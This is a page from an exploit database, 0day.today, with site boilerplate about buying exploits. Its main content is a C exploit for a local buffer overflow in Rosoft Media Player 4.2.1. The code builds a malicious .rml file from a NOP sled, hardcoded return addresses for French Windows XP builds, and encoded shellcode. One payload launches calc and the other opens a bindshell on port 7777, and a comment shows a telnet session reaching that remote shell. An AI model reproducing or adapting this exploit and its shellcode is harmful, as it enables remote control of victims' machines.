0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)
====================================================================== Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target) ====================================================================== /* rsmpf.c * Rosoft media player free local buffer overflow Exploit multi targets * Coded By : * SimO-s0fT (Maroc-anti-connexion@hotmail.com) * thanks To : Stack & fl0 fl0w & SKD * and special thanks to str0ke for his advices and support ( you are the best brotha ) * example : * ########################################################################################## # Coded By SimO-s0fT # * # 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP # * # 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP # * # 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP # * # 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP # * # USAGE : # * # exploit1.exe file.rml platform # * # more information contact me { Maroc-anti-connexion[at]hotmail[dot]com } # * # failed...: No such file or directory # * # C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0 # * # [1] execute calc.exe # * # [2] execute bindshell LPORT=7777 # * # Choose a neumber : 2 # * # simo.rml has been created! # * # C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777 # * # Console - Windows Trust 3.0 (Service Pack 3: v55 # * # # * # (C) 1985-2008 Microsoft Corp. # * # # * # # * # C:\Documents and Settings\The Fanopsis\Bureau> # * ########################################################################################## * ********************************************************************************************************/ #include <stdio.h> #include <string.h> #include <stdlib.h> #define OFFSET 4096 // calc (pour tester l'exploit) char scode1[]= "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" "\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e" "\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12" "\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56" "\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d" "\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f" "\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0" "\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33" "\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f" "\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23" "\xcc\x21\xdb\x5b"; //bind shell LPORT 7777 char scode2[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32" "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35" "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e" "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65" "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46" "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b" "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48" "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b" "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46" "\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34" "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74" "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46" "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71" "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e" "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30" "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58" "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d" "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51" "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e" "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51" "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41" "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70" "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70" "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c" "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69" "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69" "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f" "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b" "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41" "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74" "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30" "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62" "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e" "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63" "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46" "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48" "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b" "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50" "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49" "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49" "\x6f\x58\x56\x49\x6f\x78\x50\x61"; struct adresses {char *platform; unsigned long addr; } systems[]= { {"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB }, {"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 }, {"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B }, {"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D }, {NULL }, }; char NOP1[]="\x90\x90\x90\x90";// n0t working char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90"; int main(int argc,char *argv[]){ FILE *s; unsigned char *buffer; unsigned int RET= systems[atoi(argv[2])].addr; unsigned char bchars[]="\xF0\xFF\xFD\x7F"; int i; int number; int offset=0; if (argc <2){ system("cls"); printf("Coded By SimO-s0fT\n"); for(i=0;systems[i].platform;i++) printf("%d \t\t %s\n",i,systems[i].platform); printf("USAGE : \n\t"); printf(argv[0]); printf(".exe "); printf("file.rml "); printf("platform\n"); printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n"); } if ((s=fopen(argv[1],"wb"))==NULL){ perror("failed..."); exit(0); } printf("[1] execute calc.exe\n"); printf("[2] execute bindshell LPORT=7777\n"); printf(" Choose a neumber : "); scanf("%d",&number); switch(number){ case 1: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1)); memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1)); offset=OFFSET; memcpy(buffer+offset,bchars,strlen(bchars)); offset+=strlen(bchars); memcpy(buffer+offset,NOP1,strlen(NOP1)); offset+=strlen(NOP1); memcpy(buffer+offset,&RET,4); offset+=4; memcpy(buffer+offset,NOP2,strlen(NOP2)); offset+=strlen(NOP2); memcpy(buffer+offset,scode1,strlen(scode1)); offset+=strlen(scode1); fputs(buffer,s); fclose(s); printf("%s has been created!",argv[1]); free(buffer); break; case 2: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2)); memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2)); offset=OFFSET; memcpy(buffer+offset,bchars,strlen(bchars)); offset+=strlen(bchars); memcpy(buffer+offset,NOP1,strlen(NOP1)); offset+=strlen(NOP1); memcpy(buffer+offset,&RET,4); offset+=4; memcpy(buffer+offset,NOP2,strlen(NOP2)); offset+=strlen(NOP2); memcpy(buffer+offset,scode2,strlen(scode2)); offset+=strlen(scode2); fputs(buffer,s); fclose(s); printf("%s has been created!",argv[1]); free(buffer); break; } return 0; } # 0day.today [2024-12-25] #